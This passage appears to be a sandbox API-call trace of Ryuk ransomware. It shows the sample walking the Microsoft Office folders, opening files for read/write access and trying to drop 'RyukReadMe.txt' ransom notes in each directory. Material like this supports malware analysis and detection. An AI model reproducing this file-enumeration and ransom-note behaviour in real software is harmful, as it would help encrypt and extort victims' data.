[0137.588] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.589] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN065.XML", dwFileAttributes=0x80) returned 0 [0137.589] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN065.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn065.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.589] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.589] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.589] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.589] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.589] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN075.XML", dwFileAttributes=0x80) returned 0 [0137.589] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN075.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn075.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.589] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.589] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.590] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.590] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.590] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN081.XML", dwFileAttributes=0x80) returned 0 [0137.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN081.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn081.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.590] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.590] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.590] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.590] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.590] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN082.XML", dwFileAttributes=0x80) returned 0 [0137.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN082.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn082.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.590] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.591] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.591] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.591] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.591] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN086.XML", dwFileAttributes=0x80) returned 0 [0137.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN086.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn086.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.591] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.591] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.591] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.591] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.591] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN089.XML", dwFileAttributes=0x80) returned 0 [0137.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN089.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn089.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.592] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.592] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.592] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.592] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.592] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN090.XML", dwFileAttributes=0x80) returned 0 [0137.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN090.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn090.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.593] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.593] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.593] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.593] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.593] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN092.XML", dwFileAttributes=0x80) returned 0 [0137.594] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN092.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn092.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.594] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.594] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.594] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.594] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.594] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN095.XML", dwFileAttributes=0x80) returned 0 [0137.594] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN095.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn095.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.594] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.594] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.594] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.594] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.595] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN096.XML", dwFileAttributes=0x80) returned 0 [0137.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN096.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn096.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.595] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.595] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.595] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.595] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.595] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN097.XML", dwFileAttributes=0x80) returned 0 [0137.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN097.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn097.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.595] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.595] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.596] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.596] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.596] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN102.XML", dwFileAttributes=0x80) returned 0 [0137.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN102.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn102.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.596] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.596] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.596] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.596] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.596] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN103.XML", dwFileAttributes=0x80) returned 0 [0137.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN103.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn103.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.596] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.597] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.597] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.597] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.597] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN105.XML", dwFileAttributes=0x80) returned 0 [0137.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN105.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn105.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.597] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.597] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.597] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.597] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.597] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN107.XML", dwFileAttributes=0x80) returned 0 [0137.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN107.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn107.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.598] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.598] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.598] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.598] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.598] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN108.XML", dwFileAttributes=0x80) returned 0 [0137.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN108.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn108.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.598] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.598] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.598] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.598] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.599] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN109.XML", dwFileAttributes=0x80) returned 0 [0137.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN109.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn109.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.599] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.599] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.599] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.599] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.599] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN110.XML", dwFileAttributes=0x80) returned 0 [0137.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN110.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn110.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.599] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.599] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.599] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.599] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.600] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN111.XML", dwFileAttributes=0x80) returned 0 [0137.600] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN111.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn111.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.600] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.600] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.600] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.600] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.600] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PG_INDEX.XML", dwFileAttributes=0x80) returned 0 [0137.600] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PG_INDEX.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pg_index.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.600] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.600] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.601] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0137.601] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0137.601] SetLastError (dwErrCode=0x0) [0137.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.604] GetLastError () returned 0x5 [0137.604] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.604] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.604] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.604] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.604] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.604] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.604] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.604] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.604] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.604] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.604] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.604] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.604] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.604] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PPTIRM.XML", dwFileAttributes=0x80) returned 0 [0137.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PPTIRM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pptirm.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.604] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.605] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.605] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.605] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.605] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PPTIRMV.XML", dwFileAttributes=0x80) returned 0 [0137.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PPTIRMV.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pptirmv.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.606] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.606] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.606] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.606] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.606] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0137.606] SetLastError (dwErrCode=0x0) [0137.606] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.606] GetLastError () returned 0x5 [0137.606] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0137.606] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.606] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2d00 [0137.608] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.608] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.608] SetLastError (dwErrCode=0x0) [0137.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.608] GetLastError () returned 0x5 [0137.608] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0137.608] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.608] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1033\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2d60 [0137.609] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.609] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.609] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0137.609] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0137.609] SetLastError (dwErrCode=0x0) [0137.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.609] GetLastError () returned 0x5 [0137.609] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0137.609] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.609] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.609] SetLastError (dwErrCode=0x0) [0137.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.610] GetLastError () returned 0x5 [0137.610] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0137.610] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.610] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1036\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2d60 [0137.610] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.610] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.610] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0137.610] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0137.610] SetLastError (dwErrCode=0x0) [0137.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\1036\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft 